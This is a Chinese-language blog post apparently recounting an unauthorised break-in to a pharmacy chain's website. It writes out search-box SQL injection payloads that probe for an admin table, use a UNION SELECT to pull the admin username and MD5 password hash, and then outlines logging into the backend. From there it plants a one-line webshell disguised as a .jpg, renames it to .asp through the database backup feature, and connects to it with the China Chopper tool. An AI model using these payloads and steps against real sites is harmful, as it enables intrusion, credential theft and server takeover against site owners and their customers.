我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 网络攻防渗透某药品连锁店,搜索注入的利用,老鸟飞过
渗透某药品连锁店,搜索注入的利用,老鸟飞过
4106
1推荐
0评论

首先找一个能传动态参数的链接,试了一下 and 1=1

提示非法字符,估计有防注入或者IDC的防火墙。

嘿嘿,很多站点的搜索一般没做防注入,去试试

一般搜索查询语句:

Select * from 表 where 字段 like ‘%查询关键字%’

我们把这个查询关键字这里 输入查询关键字%’ and ‘%’=’

语句就变成了:

Select * from 表 where 字段 like ‘%查询关键字%’and ‘%’=’%’

查询一下:

And 后面条件换成 ‘a’=’%’查询永远不成立,呵呵,有搜索注入漏洞。

下面我们猜管理员表和账户密码

和%' and exists(select * from admin) and '%'='

有数据,admin表存在

和%' and exists(select count(username) from admin) and '%'='

和%' and exists(select count(password) from admin) and '%'='

Username password账户密码字段找到

确定这个查询的列

本次查询的列数是11个列

页面显示的1,2,8,9这4个字段的数据,把查询的这个列名换成账户密码的列名查询账户密码。

和%' union select 1,username,3,4,5,6,7,8,9,10,11 from admin where '%'='

Username:admin

和%' union select 1,password,3,4,5,6,7,8,9,10,11 from admin where '%'='

Password: 13955235245b2497

这个密码是MD5加密后的密文,自己去解密一下就行了

登陆后台

找到一个数据库备份的,拿webshell完成不是问题

上传一个.jpg格式的一句话,找到这个图片马的位置。

备份成.asp

找到备份地址,中国菜刀,链接

没什么技术,大牛飞过...

已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415